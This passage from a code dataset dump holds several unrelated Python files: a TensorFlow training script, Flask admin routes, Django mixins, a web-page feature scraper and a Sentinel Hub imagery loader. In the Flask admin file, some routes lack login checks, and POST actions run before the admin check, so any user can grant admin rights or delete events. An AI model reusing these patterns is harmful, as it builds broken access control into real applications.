train_data_iter = List_Iterator(H, img_lst = H['train_lst'],\n img_shape = H['image_shape'],\n label_shape = H['label_shape'],\n batch_size = H['batch_size'],\n num_preprocess_threads = 4,\n shuffle = True,\n is_training = True,\n )\n\n valid_data_iter = List_Iterator(H, img_lst = H['val_lst'], \n img_shape = H['image_shape'],\n label_shape = H['label_shape'],\n batch_size = H['batch_size'],\n num_preprocess_threads = 4,\n shuffle = True,\n is_training = False,\n )\n\n model = resnet3D\n\n update_scopes = [] \n #update_scopes.append('logits')\n\n # Loss operations \n\n loss_op = metrics.logloss\n\n\n # Additional Evaluation metrics\n metric_ops = None# [metrics.MSE_metric]\n\n H['train_image_summary'] = image_summaries.classification_image_summary\n H['validation_image_summary'] = image_summaries.classification_image_summary\n\n H['model_graph'] = model\n H['loss'] = loss_op\n H['metrics'] = metric_ops\n H['train_scopes'] = update_scopes\n H['train_iter'] = train_data_iter\n H['valid_iter'] = valid_data_iter\n H['VARIABLES_TO_RESTORE'] = tf.contrib.slim.get_variables_to_restore()\n H['UPDATE_OPS_COLLECTION'] = tf.GraphKeys.UPDATE_OPS\n\n args = []\n train(*args, **H)\n\ndef main(argv=None):\n train_net()\n\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(i) for i in H['gpus']])\n tf.app.run()\n","sub_path":"dsb3_networks/classification/luna_resnet3D/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"492481573","text":"import logging\nfrom flask import Blueprint, render_template, redirect, url_for, flash, make_response, request, send_from_directory\nfrom flask import current_app as app\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom flask_mail import Message, Mail\nfrom werkzeug.urls import url_parse\nfrom werkzeug.utils import secure_filename\nfrom sqlalchemy import inspect\nfrom app.models import User, Booking, 
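# --- Hedged aside on the trial division above: the loop runs to num/2, but
# it is enough to stop at sqrt(num), since any factor above the square root
# pairs with one below it. A compact sketch:
def is_prime(n):
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True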
Event, Location\nfrom app.forms import EventForm, UpdateForm, UpdateLForm, AdminRemoveForm, LocationForm\nfrom app.extensions import mail, login_manager, db\nimport datetime\nfrom datetime import datetime\nimport os\n\nMODEL_ATTRIBUTES = ['get_id', 'is_active', 'is_anonymous', 'is_authenticated', 'metadata', 'query', 'query_class']\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n#blueprint setup\nadmin_panel = Blueprint('admin_panel',\n\t\t\t__name__,\n\t\t\tstatic_folder=\"static\",\n\t\t\ttemplate_folder=\"templates\",\n\t\t\turl_prefix='/admin')\n\ndef validation(user):\n if user.su_rights == False:\n app.logger.info(\"Attempt to access Admin Panel by User ID {} at {}\".format(current_user.id, datetime.now()))\n return False\n else:\n return True \n\n@admin_panel.route('/main', methods=['GET', 'POST'])\n@login_required\ndef main():\n if request.method == 'POST': \n app.logger.info('Logs retrieved by Admin ID {} at {}'.format(current_user.id, datetime.now())) \n return send_from_directory(app.config['LOGS_FOLDER'], \"information.log\", as_attachment=True)\n return render_template('/main.html') if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n@admin_panel.route('/alldata', methods=['GET', 'POST'])\n@login_required\ndef alldata():\n return render_template('/alldata.html') if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n@admin_panel.route('/alldata/<sub_type>', methods=['GET', 'POST'])\n@login_required\ndef alldata_stype(sub_type):\n if sub_type == 'users':\n data = User.query.all()\n elif sub_type == 'bookings':\n data = Booking.query.all()\n elif sub_type == 'events':\n data = Event.query.all()\n elif sub_type == 'locations':\n data = Location.query.all()\n\n if request.method == 'POST':\n user = User.query.filter(User.id==request.form['idValue']).first()\n if request.form['modType'] == \"revoke\": \n user.su_rights = False \n app.logger.info('User ID {} demoted to user by Admin ID {} at {}'.format(user.id, current_user.id, datetime.now()))\n else: \n user.su_rights = True\n app.logger.info('User ID {} promoted to admin by Admin ID {} at {}'.format(user.id, current_user.id, datetime.now()))\n db.session.commit()\n\n return redirect(url_for('admin_panel.alldata_stype', sub_type='users'))\n\n return render_template('alldata_stype.html', sub_type=sub_type, data=data)\n\n@admin_panel.route('/event_create', methods=['GET', 'POST'])\n@login_required\ndef event_create():\n form = EventForm()\n form.location.choices = [(location.id, location.name) for location in Location.query.all()]\n\n if form.validate_on_submit():\n event = Event(name=form.name.data,\n capacity=form.capacity.data,\n max_capacity=form.capacity.data,\n start=form.start_date.data,\n end=form.end_date.data,\n location_id=form.location.data,\n img_name=form.img_name.data.filename,\n description=form.description.data)\n \n file = form.img_name.data\n\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n db.session.add(event)\n db.session.commit()\n app.logger.info('Event {} created by Admin ID {} at {}'.format(event.name, current_user.id, datetime.now()))\n return redirect(url_for('admin_panel.alldata_stype', sub_type='events'))\n\n return render_template('/event_create.html', form=form) if validation(current_user)==True else 
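# --- Refactoring sketch (a suggestion, not the shipped view): the if/elif
# chain in alldata_stype collapses into a sub_type -> model mapping using the
# models imported above.
SUB_TYPE_MODELS = {
    'users': User,
    'bookings': Booking,
    'events': Event,
    'locations': Location,
}

def query_all(sub_type):
    model = SUB_TYPE_MODELS.get(sub_type)
    if model is None:
        raise ValueError("unknown sub_type: %s" % sub_type)
    return model.query.all()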
redirect(url_for('main_panel.index'))\n\n\n@admin_panel.route('/location_create', methods=['GET', 'POST'])\ndef location_create():\n\n form = LocationForm()\n if form.validate_on_submit():\n db.session.add(Location(name=form.name.data, address=form.address.data))\n db.session.commit()\n flash(\"Successfully created Location: {}\".format(form.name.data), 'info')\n app.logger.info('Location {} created by Admin ID {} at {}'.format(form.name.data, current_user.id, datetime.now()))\n return redirect(url_for('admin_panel.alldata_stype', sub_type='locations'))\n \n return render_template('/location_create.html', form=form) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n@admin_panel.route('/event_modify', methods=['GET', 'POST'])\ndef event_modify():\n data = Event.query.all()\n\n form = AdminRemoveForm()\n form.model_type.data = \"event\"\n\n if form.validate_on_submit():\n #check for existing bookings\n if Booking.query.filter(Booking.event_id==form.event_id.data).first() != None:\n flash(\"There's an existing booking/location for this event.\", \"error\")\n else:\n Event.query.filter(Event.id==form.event_id.data).delete()\n db.session.commit()\n app.logger.info('Event ID {} deleted by Admin ID {} at {}'.format(form.event_id.data, current_user.id, datetime.now()))\n\n return redirect(url_for('admin_panel.event_modify'))\n\n return render_template('/modify.html', data=data, form=form) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n\n@admin_panel.route('/event_modify/<event_id>', methods=['GET', 'POST'])\ndef event_mod(event_id):\n event = Event.query.filter(Event.id==event_id).first()\n locations = Location.query.all()\n form = UpdateForm()\n form.capacity.data = event.capacity\n\n form.org_cap.data = event.max_capacity\n form.org_name.data = event.name\n form.org_start_date.data = event.start\n form.org_end_date.data = event.end\n \n if form.validate_on_submit():\n if form.name.data != \"\":\n event.name = form.name.data\n flash(\"Event name changed from {} to {}.\".format(form.org_name.data, form.name.data))\n \n if form.max_cap.data is not None:\n event.max_capacity = form.max_cap.data\n difference = form.max_cap.data - form.org_cap.data\n event.capacity = event.capacity + difference\n flash(\"Max capacity for {} modified from {} to {}.\".format(event.name, form.org_cap.data, form.max_cap.data), \"info\")\n\n if form.start_date.data is not None:\n event.start = form.start_date.data\n flash(\"Event {} start date modified from {} to {}.\".format(event.name, form.org_start_date.data, form.start_date.data), \"info\")\n\n if form.end_date.data is not None:\n event.end = form.end_date.data\n flash(\"Event {} end date modified from {} to {}.\".format(event.name, form.org_end_date.data, form.end_date.data), \"info\")\n\n if form.img_name.data is not None and event.img_name != form.img_name.data: \n file = form.img_name.data\n\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n event.img_name = form.img_name.data.filename\n\n if form.description.data is not None and form.description.data != \"\":\n event.description = form.description.data\n\n db.session.commit()\n app.logger.info('Event ID {} modified by Admin ID {} at {}'.format(event_id, current_user.id, datetime.now()))\n return redirect(url_for('admin_panel.event_modify'))\n \n return render_template('event_modify_id.html', form=form, event=event, locations=locations) if 
validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n\n@admin_panel.route('/location_modify', methods=['GET', 'POST'])\ndef location_modify():\n data = Location.query.all()\n\n form = AdminRemoveForm()\n form.model_type.data = \"location\"\n\n if form.validate_on_submit():\n if Event.query.filter(Event.location_id==form.location_id.data).first() != None:\n flash(\"Existing events reference this location; delete them before removing it.\", \"error\")\n else:\n Location.query.filter(Location.id==form.location_id.data).delete()\n db.session.commit()\n app.logger.info('Location ID {} deleted by Admin ID {} at {}'.format(form.location_id.data, current_user.id, datetime.now())) \n\n return redirect(url_for('admin_panel.location_modify'))\n\n return render_template('/modify.html', data=data, form=form) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n\n@admin_panel.route('/location_modify/<location_id>', methods=['GET', 'POST'])\ndef location_mod(location_id):\n location = Location.query.filter(Location.id==location_id).first()\n form = UpdateLForm()\n\n if form.validate_on_submit():\n if form.address.data != \"\":\n location.address = form.address.data\n db.session.commit()\n app.logger.info('Location ID {} modified by Admin ID {} at {}'.format(location.id, current_user.id, datetime.now())) \n\n return redirect(url_for('admin_panel.location_modify'))\n\n return render_template('/location_modify_id.html', form=form, location=location) if validation(current_user)==True else redirect(url_for('main_panel.index'))\n\n","sub_path":"app/admin/admin_routes.py","file_name":"admin_routes.py","file_ext":"py","file_size_in_byte":9733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"619019799","text":"import unittest\nfrom src.utils.validates import validate_year\n\n\nclass TestValidateYear(unittest.TestCase):\n def test_valid_string(self):\n for i in range(2000, 2005):\n self.assertTrue(validate_year(i), msg='The year %s is not valid!' % i)\n\n def test_not_string(self):\n for i in range(-2005, -2000):\n self.assertFalse(validate_year(i), msg='The year %s is valid!' % i)\n for i in range(2050, 2055):\n self.assertFalse(validate_year(i), msg='The year %s is valid!' 
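# --- The tests in this file pin validate_year down only at a few points:
# 2000-2004 valid, negative years invalid, 2050-2054 invalid. One
# implementation consistent with those cases, assuming the intended window
# is [2000, 2050), would be:
def validate_year(year):
    return isinstance(year, int) and 2000 <= year < 2050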
% i)\n","sub_path":"tests/utils/validates/validate_year.py","file_name":"validate_year.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"120760418","text":"from bs4 import BeautifulSoup as BS, SoupStrainer\nfrom bs4.element import Comment\nfrom lxml import etree\nimport re\nfrom chrome_driver.chrome_driver import ChromeDriver\nfrom component.file_processor.file_handler import FileHandler\n\n\nclass TagFinder:\n\n def __init__(self, query_tag: str, source_code: str):\n self.query_tag = query_tag\n self.source_code = source_code\n\n def find_availability(self):\n soup = BS(self.source_code, \"lxml\")\n total_found_length = len(soup.find_all(self.query_tag))\n if len(soup.find_all(self.query_tag)) == 0:\n available = \"No\"\n return available, total_found_length\n else:\n available = \"Yes\"\n return available, total_found_length\n\n def find_hyperlinks(self):\n count = 0\n for link in BS(self.source_code, \"lxml\", parse_only=SoupStrainer('a')):\n if link.has_attr('href'):\n count = count + 1\n return count\n\n def tag_visible(self, element):\n if element.parent.name in ['style', 'script', 'head', 'meta', '[document]']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n def find_prices(self):\n soup = BS(self.source_code, 'lxml')\n texts = soup.findAll(text=True)\n visible_texts = filter(self.tag_visible, texts)\n visible_text = u\" \".join(t.strip() for t in visible_texts)\n # pattern: a currency marker followed by a digit (lookahead)\n prices = re.findall(r'\s?(USD|EUR|€|£|\$)(?=\s?\d)', visible_text)\n if len(prices) > 0:\n return \"Yes\"\n return \"No\"\n\n def find_cta(self, cta_keyword):\n soup = BS(self.source_code, 'lxml')\n buttons = soup.findAll('button')\n a_tags_ctas = soup.findAll('a')\n div_buttons = [element for element in\n soup.select('div[class*=\"button\"]')] ###checks div class which contains button\n div_buttons_short = [element for element in\n soup.select('div[class*=\"btn\"]')] ##checks div class which contains button\n\n buttons_button_text = [i.text.strip() for i in buttons]\n atags_text = [atags.text.strip() for atags in a_tags_ctas]\n div_button_text = [i.text.strip() for i in div_buttons]\n div_buttons_short_text = [i.text.strip() for i in div_buttons_short]\n all_button_text = div_button_text + buttons_button_text + div_buttons_short_text + atags_text\n all_button_text = list(filter(None, all_button_text))\n\n cta_count = 0\n for button_text in all_button_text:\n for keyword in cta_keyword:\n if keyword.lower() in button_text.lower():\n cta_count = cta_count + 1\n # print(all_button_text)\n # print(\"cta count \", str(cta_count))\n return cta_count\n\n def find_video_status(self):\n soup = BS(self.source_code, 'lxml')\n video_tags = soup.findAll('video')\n if len(video_tags) > 0:\n return \"Yes\"\n else:\n iframe_src = [iframe for iframe in soup.find_all('iframe')]\n if len(iframe_src) > 0:\n for iframe in iframe_src:\n if iframe.has_attr('src'):\n if 'youtube' in iframe['src']:\n print(\"youtube\")\n return \"Yes\"\n elif 'vimeo' in iframe['src']:\n return \"Yes\"\n\n video_tags = [element for element in soup.select('div[class*=\"video\"]')]\n if len(video_tags) > 0:\n return \"Yes\"\n return \"No\"\n\n def find_pop_up(self):\n soup = BS(self.source_code, 'lxml')\n page_modal_class = [element for element in soup.select('div[class*=\"modal\"]')]\n page_popup_class = [element for element in soup.select('div[class*=\"popup\"]')]\n page_modal_id = [element for element in soup.select('div[id*=\"modal\"]')]\n page_popup_id = [element for 
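# --- Usage sketch for the class above; the HTML snippet is invented for the
# demo and the expected values follow from the method bodies.
html = "<html><body><a href='/x'>x</a><video></video></body></html>"
finder = TagFinder(query_tag="video", source_code=html)
available, count = finder.find_availability()  # expected ("Yes", 1)
links = finder.find_hyperlinks()               # expected 1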
element in soup.select('div[id*=\"popup\"]')]\n popup = page_modal_class + page_popup_class + page_modal_id + page_popup_id\n if len(popup) > 0:\n return \"Yes\"\n return \"No\"\n\n\nif __name__ == '__main__':\n cta_keywords_file_name = 'cta-keywords.csv'\n file_worker = FileHandler()\n cta_keywords_df = file_worker.file_reader(cta_keywords_file_name)\n cta_keywords = cta_keywords_df['keywords'].tolist()\n url = \"https://www.dkawellness.com/dka--bb-fruitadv-tba/?time_elapsed=1&tab_comp=1&noplay=1&controls=1\"\n # chrome_driver = ChromeDriver()\n # chrome_browser = chrome_driver.get_chrome_driver()\n # chrome_browser.get(url)\n # source_code = chrome_browser.page_source\n # TagFinder('', source_code).find_cta(cta_keywords)\n TagFinder('', \"\").find_video_status()\n","sub_path":"component/metrics_worker/tag_finder.py","file_name":"tag_finder.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"526112990","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.decorators import method_decorator\nfrom django.http import Http404\n\nclass StaffRequiredMixin(object):\n @classmethod\n def as_view(self, *args, **kwargs):\n view = super(StaffRequiredMixin, self).as_view(*args, **kwargs)\n return login_required(view)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if request.user.is_staff:\n return super(StaffRequiredMixin, self).dispatch(request, *args, **kwargs)\n else:\n raise Http404\n\n\nclass LoginRequiredMixin(object):\n @classmethod\n def as_view(self, *args, **kwargs):\n view = super(LoginRequiredMixin, self).as_view(*args, **kwargs)\n return login_required(view)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n return super(LoginRequiredMixin, self).dispatch(request, *args, **kwargs)\n\n\nclass FilterMixin(object):\n filter_class = None\n search_ordering_param = 'ordering'\n\n def get_queryset(self, *args, **kwargs):\n try:\n qs = super(FilterMixin, self).get_queryset(*args, **kwargs)\n return qs\n except:\n raise ImproperlyConfigured('You must have a queryset in order to use the FilterMixin')\n\n def get_context_data(self, *args, **kwargs):\n context = super(FilterMixin, self). 
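# --- Hedged usage sketch: these mixins are meant to sit to the left of the
# view class so their dispatch() runs first. ProductListView and the template
# path are invented names for illustration.
from django.views.generic import ListView

class ProductListView(StaffRequiredMixin, ListView):
    template_name = 'products/list.html'
    # model = Product  # whichever model the project defines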
get_context_data(*args, **kwargs)\n qs = self.get_queryset(*args, **kwargs)\n ordering = self.request.GET.get(self.search_ordering_param)\n if ordering:\n qs = qs.order_by(ordering)\n filter_class = self.filter_class\n if filter_class:\n fs = filter_class(self.request.GET, queryset=qs)\n context['object_list'] = fs\n return context\n","sub_path":"products/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"125595718","text":"import os\nfrom datetime import datetime, timedelta\nimport time\nimport re\nimport numpy as np\nimport xarray as xr\nimport requests\nfrom requests_futures.sessions import FuturesSession\nfrom concurrent.futures import ThreadPoolExecutor\nfrom osgeo import gdal\nfrom sentinelhub import WmsRequest, WcsRequest, MimeType, CRS, BBox, CustomUrlParam, BBoxSplitter\nfrom sentinelhub.constants import AwsConstants\nfrom sentinelhub.config import SHConfig\nimport sentinelhub.geo_utils\nfrom eolearn.core import FeatureType, EOPatch\nimport math\nimport imageio\nfrom dask import delayed\nimport dask.array as da\n\n\nfrom ._common import ProcessEOTask, ProcessArgumentInvalid, Internal\n\n\nSENTINELHUB_INSTANCE_ID = os.environ.get('SENTINELHUB_INSTANCE_ID', None)\nSENTINELHUB_LAYER_ID_S2L1C = os.environ.get('SENTINELHUB_LAYER_ID_S2L1C', None)\nSENTINELHUB_LAYER_ID_S1GRD = os.environ.get('SENTINELHUB_LAYER_ID_S1GRD', None)\n\ndef _clean_temporal_extent(temporal_extent):\n \"\"\"\n EOLearn expects the date strings not to include `Z` at the end, so we\n fix input here. It also doesn't deal with None, so we fix this.\n Note that this implementation is still not 100% correct, because we should\n also be accepting strings with *only time* for example.\n https://eo-learn.readthedocs.io/en/latest/eolearn.io.sentinelhub_service.html#eolearn.io.sentinelhub_service.SentinelHubOGCInput.execute\n \"\"\"\n\n # Check that only one of the intervals is None: (if any)\n # https://open-eo.github.io/openeo-api/processreference/#load_collection\n # > Also supports open intervals by setting one of the boundaries to null, but never both.\n if temporal_extent == [None, None]:\n raise ProcessArgumentInvalid(\"The argument 'temporal_extent' in process 'load_collection' is invalid: Only one boundary can be set to null.\")\n if not isinstance(temporal_extent,list) or len(temporal_extent) != 2:\n raise ProcessArgumentInvalid(\"The argument 'temporal_extent' in process 'load_collection' is invalid: The interval has to be specified as an array with exactly two elements.\")\n\n result = [None if t is None else t.rstrip('Z') for t in temporal_extent]\n if result[0] is None:\n result[0] = '1970-01-01'\n if result[1] is None:\n # result[1] = 'latest' # currently this doesn't work\n result[1] = datetime.utcnow().isoformat()\n return result\n\n\ndef _raise_exception_based_on_eolearn_message(str_ex):\n # EOLearn raises an exception which doesn't have the original data anymore, so we must\n # parse the message to figure out if the error was 4xx or 5xx.\n r = re.compile(r'Failed to download from:\\n([^\\n]+)\\nwith ([^:]+):\\n([4-5][0-9]{2}) ([^:]+): (.*)')\n m = r.match(str_ex)\n if m:\n g = m.groups()\n status_code = int(g[2])\n if 400 <= status_code < 500:\n raise ProcessArgumentInvalid(f\"The argument '' in process 'load_collection' is invalid: {str_ex}\")\n\n # we can't make sense of the message, bail out with generic exception:\n raise Internal(\"Server error: EOPatch creation failed: 
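# --- Quick illustration of _clean_temporal_extent's contract, read off the
# body above (comments only, no new behavior):
#   _clean_temporal_extent(["2019-01-01T00:00:00Z", "2019-02-01T00:00:00Z"])
#       -> ["2019-01-01T00:00:00", "2019-02-01T00:00:00"]   # 'Z' stripped
#   _clean_temporal_extent([None, "2019-02-01T00:00:00"])
#       -> ["1970-01-01", "2019-02-01T00:00:00"]            # open lower bound
#   _clean_temporal_extent([None, None])  # raises ProcessArgumentInvalid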
{}\".format(str_ex))\n\n\ndef validate_bands(bands, ALL_BANDS, collection_id):\n if bands is None:\n return ALL_BANDS\n if not set(bands).issubset(ALL_BANDS):\n valids = \",\".join(ALL_BANDS)\n raise ProcessArgumentInvalid(\"The argument 'bands' in process 'load_collection' is invalid: Invalid bands encountered; valid bands for {} are '[{}]'.\".format(collection_id,valids))\n return bands\n\n\ndef get_orbit_dates(dates):\n \"\"\"\n We calculate orbit dates by grouping together those dates that are less than an hour apart.\n Returns a list of objects, each with keys \"from\" and \"to\", containing datetime structs.\n \"\"\"\n sorted_dates = sorted(dates)\n result = []\n for d in sorted_dates:\n if len(result) == 0 or d - result[-1][\"to\"] > timedelta(hours=1):\n result.append({\"from\": d, \"to\": d}) # new orbit\n else:\n result[-1][\"to\"] = d # same orbit\n\n return result\n\n\ndef construct_image(data, n_width, n_height):\n rows = []\n for i in range(n_height):\n print(data[i::n_height])\n rows.append(da.concatenate(data[i::n_height], axis=1))\n return da.concatenate(rows[::-1], axis=0)\n\n\ndef download_data(self, dataset, orbit_dates, total_width, total_height, bbox, temporal_extent, bands, dataFilter_params, max_chunk_size=1000):\n auth_token = SHProcessingAuthTokenSingleton.get()\n url = 'https://services.sentinel-hub.com/api/v1/process'\n headers = {\n 'Accept': 'image/tiff',\n 'Authorization': f'Bearer {auth_token}'\n }\n\n n_width = math.ceil(total_width/max_chunk_size)\n n_height = math.ceil(total_height/(max_chunk_size*max_chunk_size/(total_width//n_width + 1)))\n bbox_list = BBoxSplitter([bbox.geometry], CRS.WGS84, (n_width, n_height)).get_bbox_list()\n x_image_shapes = [total_width//n_width + 1 if w < total_width % n_width else total_width//n_width for w in range(n_width)]\n y_image_shapes = [total_height//n_height + 1 if h < total_height % n_height else total_height//n_height for h in range(n_height)]\n\n adapter_kwargs = dict(pool_maxsize=len(orbit_dates)*n_width*n_height)\n executor = ThreadPoolExecutor(max_workers=len(orbit_dates)*n_width*n_height)\n requests_session = FuturesSession(executor=executor, adapter_kwargs=adapter_kwargs)\n response_futures = {}\n\n orbit_times_middle,shapes = [],{}\n\n tmp_folder = f\"/tmp-{self.job_id}\"\n if os.path.exists(tmp_folder):\n os.rmdir(tmp_folder)\n os.mkdir(tmp_folder)\n\n for i, date in enumerate(orbit_dates):\n mean_time = date[\"from\"] + (date[\"to\"] - date[\"from\"]) / 2\n tile_from = mean_time - timedelta(minutes=25)\n tile_to = mean_time + timedelta(minutes=25)\n orbit_times_middle.append(mean_time)\n shapes[i] = []\n\n for j, bbox_section in enumerate(bbox_list):\n request_params = {\n \"input\": {\n \"bounds\": {\n \"bbox\": [bbox_section.min_x, bbox_section.min_y, bbox_section.max_x, bbox_section.max_y],\n \"properties\": {\n \"crs\": \"http://www.opengis.net/def/crs/EPSG/0/4326\",\n }\n },\n \"data\": [\n {\n \"type\": dataset,\n \"dataFilter\": {\n \"timeRange\": {\n \"from\": tile_from.strftime(\"%Y-%m-%dT%H:%M:%S+00:00\"),\n \"to\": tile_to.strftime(\"%Y-%m-%dT%H:%M:%S+00:00\"),\n },\n **dataFilter_params,\n }\n },\n ],\n },\n \"output\": {\n \"width\": x_image_shapes[j//n_height],\n \"height\": y_image_shapes[j%n_height],\n },\n \"evalscript\": f\"\"\"//VERSION=3\n\n function setup() {{\n return {{\n input: [{', '.join([f'\"{b}\"' for b in bands])}, \"dataMask\"],\n output: {{\n bands: {len(bands) + 1},\n sampleType: \"FLOAT32\",\n }}\n }}\n }}\n\n function evaluatePixel(sample) {{\n return [{\", 
\".join(['sample.' + b for b in bands])}, sample.dataMask]\n }}\n \"\"\"\n }\n shapes[i].append((y_image_shapes[j%n_height],x_image_shapes[j//n_height],len(bands)+1))\n r = requests_session.post(url, headers=headers, json=request_params)\n response_futures[r] = {\"date\":i,\"bbox\":j}\n\n dates_filenames = {}\n\n for r_future, indices in response_futures.items():\n r = r_future.result()\n if r.status_code != 200:\n raise Internal(r.content)\n self.logger.debug('Image received.')\n\n tmp_filename = f'{tmp_folder}/image-{indices[\"date\"]}-{indices[\"bbox\"]}.tiff'\n if dates_filenames.get(indices[\"date\"]) is None:\n dates_filenames[indices[\"date\"]] = [tmp_filename]\n else:\n dates_filenames[indices[\"date\"]].append(tmp_filename)\n with open(tmp_filename, 'wb') as f:\n f.write(r.content)\n\n response_data = []\n for i in range(len(orbit_dates)):\n images = [delayed(imageio.imread)(filename) for filename in dates_filenames[i]]\n images = [da.from_delayed(image, shape=shapes[i][j], dtype=np.float32) for j,image in enumerate(images)]\n image_gdal = construct_image(images, n_width, n_height)\n response_data.append(image_gdal)\n\n response_data = da.stack(response_data)\n self.logger.debug('Images created.')\n return response_data, orbit_times_middle\n\n\nclass SHProcessingAuthTokenSingleton(object):\n _access_token = None\n _valid_until = None\n\n @classmethod\n def get(cls):\n if cls._access_token is not None and cls._valid_until > time.time():\n return cls._access_token\n\n client_id = os.environ.get('SH_CLIENT_ID')\n auth_secret = os.environ.get('SH_AUTH_SECRET')\n if not client_id or not auth_secret:\n raise Internal(\"Missing SH credentials\")\n\n url = 'https://services.sentinel-hub.com/oauth/token'\n data = f'grant_type=client_credentials&client_id={client_id}&client_secret={auth_secret}'\n r = requests.post(url, headers={'Content-Type': 'application/x-www-form-urlencoded'}, data=data)\n if r.status_code != 200:\n raise Internal(\"Error authenticating, received code: \" + str(r.status_code))\n\n j = r.json()\n cls._access_token = j[\"access_token\"]\n cls._valid_until = time.time() + j[\"expires_in\"] - 5\n return cls._access_token\n\n\nclass load_collectionEOTask(ProcessEOTask):\n @staticmethod\n def _convert_bbox(spatial_extent):\n crs = spatial_extent.get('crs', 4326)\n return BBox(\n (spatial_extent['west'],\n spatial_extent['south'],\n spatial_extent['east'],\n spatial_extent['north'],),\n CRS(crs), # we support whatever sentinelhub-py supports\n )\n\n\n def process(self, arguments):\n start_time = time.time()\n collection_id = self.validate_parameter(arguments, \"id\", required=True, allowed_types=[str])\n spatial_extent = self.validate_parameter(arguments, \"spatial_extent\", required=True)\n temporal_extent = self.validate_parameter(arguments, \"temporal_extent\", required=True)\n temporal_extent = _clean_temporal_extent(temporal_extent)\n bands = self.validate_parameter(arguments, \"bands\", default=None, allowed_types=[type(None), list])\n\n if bands is not None and not len(bands):\n raise ProcessArgumentInvalid(\"The argument 'bands' in process 'load_collection' is invalid: At least one band must be specified.\")\n\n bbox = load_collectionEOTask._convert_bbox(spatial_extent)\n\n # check if the bbox is within the allowed limits:\n options = arguments.get(\"options\", {})\n if options.get(\"width\") or options.get(\"height\"):\n width = options.get(\"width\", options.get(\"height\"))\n height = options.get(\"height\", options.get(\"width\"))\n else:\n width, height = 
sentinelhub.geo_utils.bbox_to_dimensions(bbox, 10.0)\n\n band_aliases = {}\n\n if collection_id == 'S2L1C':\n dataset = \"S2L1C\"\n ALL_BANDS = AwsConstants.S2_L1C_BANDS\n bands = validate_bands(bands, ALL_BANDS, collection_id)\n DEFAULT_RES = '10m'\n kwargs = dict(\n layer=SENTINELHUB_LAYER_ID_S2L1C,\n maxcc=1.0, # maximum allowed cloud cover of original ESA tiles\n )\n dataFilter_params = {\n \"previewMode\": \"EXTENDED_PREVIEW\",\n }\n band_aliases = {\n \"nir\": \"B08\",\n \"red\": \"B04\",\n }\n\n elif collection_id == 'S1GRDIW':\n dataset = \"S1GRD\"\n # https://docs.sentinel-hub.com/api/latest/#/data/Sentinel-1-GRD?id=available-bands-and-data\n ALL_BANDS = ['VV', 'VH']\n bands = validate_bands(bands, ALL_BANDS, collection_id)\n\n # https://docs.sentinel-hub.com/api/latest/#/data/Sentinel-1-GRD?id=resolution-pixel-spacing\n # Value Description\n # HIGH 10m/px for IW and 25m/px for EW\n # MEDIUM 40m/px for IW and EW\n # https://sentinel-hub.com/develop/documentation/eo_products/Sentinel1EOproducts\n # Sensing Resolution:\n # - Medium\n # - High\n # Similarly to polarization, not all beam mode/polarization combinations will have data\n # at the chosen resolution. IW is typically sensed in High resolution, EW in Medium.\n DEFAULT_RES = '10m'\n kwargs = dict(\n layer=SENTINELHUB_LAYER_ID_S1GRD,\n )\n dataFilter_params = {}\n band_aliases = {}\n\n else:\n raise ProcessArgumentInvalid(\"The argument 'id' in process 'load_collection' is invalid: unknown collection id\")\n\n self.logger.debug(f'Requesting dates between: {temporal_extent}')\n request = WmsRequest(\n **kwargs,\n instance_id=SENTINELHUB_INSTANCE_ID,\n bbox=bbox,\n time=temporal_extent,\n width=width,\n height=height,\n )\n dates = request.get_dates()\n orbit_dates = get_orbit_dates(dates)\n response_data,orbit_times_middle = download_data(self, dataset, orbit_dates, width, height, bbox, temporal_extent, bands, dataFilter_params)\n\n mask = response_data[:, :, :, -1:] # \":\" keeps the dimension\n mask = np.repeat(mask, len(bands), axis=-1).astype(bool)\n data = response_data[:, :, :, :-1]\n masked_data = da.ma.masked_array(data, mask=~mask)\n\n xrdata = xr.DataArray(\n masked_data,\n dims=('t', 'y', 'x', 'band'),\n coords={\n 'band': bands,\n 't': orbit_times_middle,\n },\n attrs={\n \"band_aliases\": band_aliases,\n \"bbox\": bbox,\n },\n )\n self.logger.debug(f'Returning xarray, job [{self.job_id}] execution time: {time.time() - start_time}')\n return xrdata\n","sub_path":"workers/process/load_collection.py","file_name":"load_collection.py","file_ext":"py","file_size_in_byte":14624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"336314264","text":"import time\nimport pygame\nimport gym\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport random\n\nfrom collections import deque\nfrom tensorflow.layers import dense\nfrom tensorflow.initializers import random_normal as 